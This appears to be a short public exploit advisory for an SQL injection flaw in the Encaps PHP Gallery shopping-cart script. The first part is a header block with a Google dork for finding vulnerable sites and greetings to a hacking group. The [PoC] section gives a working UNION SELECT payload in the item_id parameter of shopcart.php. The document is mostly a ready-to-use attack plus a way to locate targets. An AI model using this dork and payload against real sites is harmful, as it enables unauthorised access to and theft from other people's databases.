27 lines
No EOL
846 B
Text
Executable file
27 lines
No EOL
846 B
Text
Executable file
# Exploit Title: Encaps PHP Gallery SQL Injection
|
|
# Date: 14/03/2012
|
|
# Author: Daniel Godoy
|
|
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
|
|
# Author Web: www.delincuentedigital.com.ar
|
|
# Software: Encaps PHP Gallery
|
|
# http://www.encaps.net/software/encapsgallery/
|
|
# Tested on: Linux
|
|
# Dork: "shopcart.php?action=add&item_id="
|
|
|
|
[Comment]
|
|
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt,
|
|
Maximiliano Soler
|
|
Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
|
|
InyeXion,LinuxFer, Scorp
|
|
her0, r0dr1 y demas user de RemoteExecution
|
|
www.remoteexecution.info www.remoteexcution.com.ar
|
|
#RemoteExecution Hacking Group
|
|
|
|
[PoC]
|
|
|
|
http://localhost/software/encapsgallery/templates/Shopcart/shopcart.php?action=add&item_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
|
|
|
|
|
|
|
|
|
|
|